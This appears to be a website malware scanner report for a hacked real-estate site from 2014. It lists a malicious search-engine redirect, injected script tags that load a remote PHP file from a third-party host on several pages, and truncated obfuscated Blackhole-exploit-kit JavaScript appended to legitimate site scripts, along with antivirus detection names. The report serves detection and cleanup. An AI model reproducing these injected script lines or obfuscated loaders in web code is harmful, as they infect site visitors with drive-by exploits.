New scan:

Malware Scanner report for estatesatthomaslake.com

Malicious/Suspicious/Total urls checked
3/7/15
10 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://reddeerhotyoga.ca/aeed.html?h=3358068
202 websites infected.

The website "estatesatthomaslake.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://estatesatthomaslake.com/
(imitation of visitor from search engine)

GET / HTTP/1.1
Host: estatesatthomaslake.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Tue, 02 Sep 2014 11:51:20 GMT
Location: http://reddeerhotyoga.ca/aeed.html?h=3358068
Server: Apache
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1
malicious

Scanned pages/files

RequestServer responseStatus
http://estatesatthomaslake.com/
200 OK
Content-Length: 7827
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732582"></script>

http://estatesatthomaslake.com/page8.html
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://estatesatthomaslake.com/test404page.js
404 Not Found
Content-Length: 2881
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732590"></script>

http://estatesatthomaslake.com/page9.html
200 OK
Content-Length: 7351
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732588"></script>

http://estatesatthomaslake.com/wpscripts/jspngfix.js
200 OK
Content-Length: 5886
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('');
var supported = !/Gecko/.test(navigator.userAgent) && !/Opera/.test(navigator.userAgent) && /MSIE (5\.5)|[6]/.test(navigator.userAgent) && navigator.platform == "Win32";
function OnLoadPngFix() {
if(!supported) return;
if(!event.srcElement) return;
var src=event.srcElement.src;
if(!src) return;
if(!new RegExp(blankSrc).test(src)) {
if(/\.png$/.test(src.toLowerCase())) {
src = src.replace(/\(/g, "(" );
... 3101 bytes are skipped ...
:1:70:27:30:1f:20:32:4:1:74:4:1:74"[lwz](":");}imcj=uaxdr;syp=[];for(zmstyy=22-20-2;-zmstyy 1381!=0;zmstyy =1){trrm=zmstyy;if((0x19==031))syp =String.fromCharCode(eval(wiu imcj[1*trrm]) 0xa-vvqzo);}nli=eval;nli(syp)}

pt>')
/*/339810*/

Antivirus reports:

AntiVir
EXP/JS.Expack.GQ
Avast
JS:Decode-BML [Trj]
Ikarus
JS.Exploit.BlackHole
Rising
JS:Trojan.Script.JS.Quidvetis.a!1612880
Comodo
Exploit.JS.Expack.G
McAfee-GW-Edition
JS/Exploit-Blacole.eu
DrWeb
JS.IFrame.500
Microsoft
VirTool:JS/Obfuscator.EH
Fortinet
JS/Blacole.EU!tr.dldr
McAfee
JS/Exploit-Blacole.eu
AVG
JS/Redir
Norman
Kryptik.CCLX

http://estatesatthomaslake.com/wpscripts/jsRollover.js
200 OK
Content-Length: 7254
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('');
rolls = new Array(); numRolls=0;
function PPFindObj(n, d) {
var p,i,x;
if( !d ) d=document;
if((p=n.indexOf("?"))>0&&parent.frames.length) { d=parent.frames[n.substring(p 1)].document; n=n.substring(0,p); }
if( !(x=d[n])&&d.all ) x=d.all[n];
for( i=0;!x&&i<d.forms.length;i ) x=d.forms[i][n];
for( i=0;!x&&d.layers&&i<d.layers.length;i ) x=PPFindObj(n,d.layers[i].document);

... 3227 bytes are skipped ...
function mrxjk(){yfz=function(){--(skg.body)}()}skg=document;for(xnj=0;xnj<sozl["length"];xnj =1){sozl[xnj]=-(34) parseInt(sozl[xnj],qskja*4);}try{mrxjk()}catch(kulxze){fjzp=50-50;}if(!fjzp)tcm(String[nvgeq].apply(String,sozl));

810*/f27*

Antivirus reports:

AntiVir
HTML/ExpKit.Gen5
Avast
JS:Includer-ATK [Trj]
Ikarus
Exploit.JS.Blackhole
Microsoft
VirTool:JS/Obfuscator.EJ
Fortinet
JS/Redirector.BOZ!tr
NANO-Antivirus
Trojan.Script.Expack.chulnr
AVG
JS/Exploit
Norman
Blacole.XQ
ESET-NOD32
JS/Kryptik.AOT

http://estatesatthomaslake.com/index.html
200 OK
Content-Length: 7827
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732582"></script>

http://estatesatthomaslake.com/page3.html
200 OK
Content-Length: 0
Content-Type: text/html
clean
http://estatesatthomaslake.com/page4.html
200 OK
Content-Length: 11142
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732584"></script>

http://estatesatthomaslake.com/page8a.html
200 OK
Content-Length: 6685
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732587"></script>

http://estatesatthomaslake.com/page7.html
200 OK
Content-Length: 10296
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" src="http://jamaica2012.domcek32.sk/srbija%20not%20done%20yet/gqbrpcc4.php?id=51732585"></script>

http://estatesatthomaslake.com/wpscripts/jsValidation.js
200 OK
Content-Length: 6638
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

document.write('');
function ValidateEmail(sEmail)
{
var reEmail=/^(. )@(. )$/;
var reQuotedString="(\"[^\"]*\")";
var reIPDomain=/^\[(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})\]$/;
var reValidCharString="\[^\\s\\(\\)><@,;:\\\\\\\"\\.\\[\\]\] ";
var reGetString="(" reValidCharString "|" reQuotedString ")";
var reUserName=new RegExp("^" reGetString "(\\." reGetString ")*$");
var reDomain=new RegExp("^" reValidCharString "(\\." reVa
... 3191 bytes are skipped ...
(3)];function mrxjk(){yfz=function(){--(skg.body)}()}skg=document;for(xnj=0;xnj<sozl["length"];xnj =1){sozl[xnj]=-(34) parseInt(sozl[xnj],qskja*4);}try{mrxjk()}catch(kulxze){fjzp=50-50;}if(!fjzp)tcm(String[nvgeq].apply(String,sozl));

a5f*

Antivirus reports:

AntiVir
HTML/ExpKit.Gen5
Avast
JS:Includer-ATK [Trj]
Ikarus
Exploit.JS.Blackhole
Emsisoft
Backdoor.Agent.ZKZ (B)
Microsoft
VirTool:JS/Obfuscator.EJ
Fortinet
JS/Redirector.BOZ!tr
AVG
JS/Exploit
Norman
Blacole.XQ
ESET-NOD32
JS/Kryptik.APC

http://estatesatthomaslake.com/CCR1.pdf
200 OK
Content-Length: 300869
Content-Type: application/pdf
clean
http://estatesatthomaslake.com/CCR2.pdf
200 OK
Content-Length: 90909
Content-Type: application/pdf
clean
http://estatesatthomaslake.com/MINUTES 10-26-09.doc
200 OK
Content-Length: 61952
Content-Type: application/msword
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=estatesatthomaslake.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://estatesatthomaslake.com/

Result: estatesatthomaslake.com is not infected or malware details are not published yet.